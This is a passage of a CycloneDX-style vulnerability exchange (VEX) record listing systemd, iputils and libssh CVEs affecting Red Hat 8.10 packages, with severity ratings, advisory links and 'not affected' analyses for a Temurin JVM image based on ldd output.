          "url": "https://github.com/systemd/systemd/commit/49f1f2d4a7612bbed5211a73d11d6a94fbe3bb69%20%28main%29"
        },
        {
          "url": "https://github.com/systemd/systemd/commit/76e0ab49c47965877c19772a2b3bf55f6417ca39%20%28main%29"
        },
        {
          "url": "https://github.com/systemd/systemd/commit/868d95577ec9f862580ad365726515459be582fc%20%28main%29"
        },
        {
          "url": "https://github.com/systemd/systemd/commit/8fc7b2a211eb13ef1a94250b28e1c79cab8bdcb9%20%28main%29"
        },
        {
          "url": "https://github.com/systemd/systemd/commit/9ce8e3e449def92c75ada41b7d10c5bc3946be77%20%28main%29"
        },
        {
          "url": "https://github.com/systemd/systemd/commit/e6a8687b939ab21854f12f59a3cce703e32768cf%20%28main%29"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2025-4598.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-18153.html"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2025/07/msg00022.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-4598"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7559-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-4598"
        },
        {
          "url": "https://www.openwall.com/lists/oss-security/2025/05/29/3"
        },
        {
          "url": "https://www.openwall.com/lists/oss-security/2025/08/18/3"
        },
        {
          "url": "https://www.qualys.com/2025/05/29/apport-coredump/apport-coredump.txt"
        }
      ],
      "published": "2025-05-30T14:15:23+00:00",
      "updated": "2026-06-30T11:16:22+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "239-82.el8_10.17",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "239-82.el8_10.17",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "239-82.el8_10.17",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "Exploitability analysis, additional details:\nTemurin JVM binary is linked only against glibc:\n$ ldd /usr/lib/jvm/temurin-17-jre/bin/java\n        linux-vdso.so.1 (0x0000ffff8cd00000)\n        libjli.so => /usr/lib/jvm/temurin-17-jre/bin/../lib/libjli.so (0x0000ffff8cc70000)\n        libpthread.so.0 => /lib64/libpthread.so.0 (0x0000ffff8cc3b000)\n        libdl.so.2 => /lib64/libdl.so.2 (0x0000ffff8cc1a000)\n        libc.so.6 => /lib64/libc.so.6 (0x0000ffff8caa4000)\n        /lib/ld-linux-aarch64.so.1 (0x0000ffff8ccc2000)"
      }
    },
    {
      "id": "CVE-2025-47268",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        190
      ],
      "description": "ping in iputils before 20250602 allows a denial of service (application error or incorrect data collection) via a crafted ICMP Echo Reply packet, because of a signed 64-bit integer overflow in timestamp multiplication.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-47268"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2025:9432"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-47268"
        },
        {
          "url": "https://bugzilla.redhat.com/2364090"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2364090"
        },
        {
          "url": "https://bugzilla.suse.com/show_bug.cgi?id=1242300"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-47268"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2025-9432.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2025:9432"
        },
        {
          "url": "https://github.com/Zephkek/ping-rtt-overflow/"
        },
        {
          "url": "https://github.com/iputils/iputils/commit/070cfacd7348386173231fb16fad4983d4e6ae40"
        },
        {
          "url": "https://github.com/iputils/iputils/issues/584"
        },
        {
          "url": "https://github.com/iputils/iputils/pull/585"
        },
        {
          "url": "https://github.com/iputils/iputils/releases/tag/20250602"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2025-47268.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2025-9432.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-47268"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7670-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-47268"
        }
      ],
      "published": "2025-05-05T14:15:29+00:00",
      "updated": "2026-06-17T09:27:38+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/iputils@20180629-11.el8?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "20180629-11.el8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/iputils@20180629-11.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/iputils@20180629-11.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/iputils@20180629-11.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/iputils@20180629-11.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/iputils@20180629-11.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/iputils@20180629-11.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/iputils@20180629-11.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/iputils@20180629-11.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/iputils@20180629-11.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/iputils@20180629-11.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/iputils@20180629-11.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/iputils@20180629-11.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/iputils@20180629-11.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/iputils@20180629-11.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/iputils@20180629-11.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/iputils@20180629-11.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/iputils@20180629-11.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/iputils@20180629-11.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/iputils@20180629-11.el8?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "Exploitability analysis, additional details:\nTemurin JVM binary is linked only against glibc:\n$ ldd /usr/lib/jvm/temurin-17-jre/bin/java\n        linux-vdso.so.1 (0x0000ffff8cd00000)\n        libjli.so => /usr/lib/jvm/temurin-17-jre/bin/../lib/libjli.so (0x0000ffff8cc70000)\n        libpthread.so.0 => /lib64/libpthread.so.0 (0x0000ffff8cc3b000)\n        libdl.so.2 => /lib64/libdl.so.2 (0x0000ffff8cc1a000)\n        libc.so.6 => /lib64/libc.so.6 (0x0000ffff8caa4000)\n        /lib/ld-linux-aarch64.so.1 (0x0000ffff8ccc2000)"
      }
    },
    {
      "id": "CVE-2025-4878",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.6,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        416
      ],
      "description": "A vulnerability was found in libssh, where an uninitialized variable exists under certain conditions in the privatekey_from_file() function. This flaw can be triggered if the file specified by the filename doesn't exist and may lead to possible signing failures or heap corruption.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-4878"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:18683"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-4878"
        },
        {
          "url": "https://bugzilla.redhat.com/2369367"
        },
        {
          "url": "https://bugzilla.redhat.com/2376184"
        },
        {
          "url": "https://bugzilla.redhat.com/2376193"
        },
        {
          "url": "https://bugzilla.redhat.com/2383220"
        },
        {
          "url": "https://bugzilla.redhat.com/2383888"
        },
        {
          "url": "https://bugzilla.redhat.com/2433121"
        },
        {
          "url": "https://bugzilla.redhat.com/2436979"
        },
        {
          "url": "https://bugzilla.redhat.com/2436980"
        },
        {
          "url": "https://bugzilla.redhat.com/2436981"
        },
        {
          "url": "https://bugzilla.redhat.com/2436982"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2369367"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2376184"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2376193"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2383220"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2383888"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2433121"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2436979"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2436980"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2436981"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2436982"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-4877"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-4878"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-5351"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-8114"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-8277"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0964"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0965"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0966"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0967"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0968"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-18683.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:18683"
        },
        {
          "url": "https://git.libssh.org/projects/libssh.git/commit/?id=697650caa97eaf7623924c75f9fcfec6dd423cd1"
        },
        {
          "url": "https://git.libssh.org/projects/libssh.git/commit/?id=b35ee876adc92a208d47194772e99f9c71e0bedb"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2025-4878.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-18683.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-4878"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7619-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7696-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-4878"
        },
        {
          "url": "https://www.libssh.org/security/advisories/CVE-2025-4878.txt"
        }
      ],
      "published": "2025-07-22T15:15:36+00:00",
      "updated": "2026-06-30T11:16:23+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10",
          "versions": [
            {
              "version": "0.9.6-16.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "0.9.6-16.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
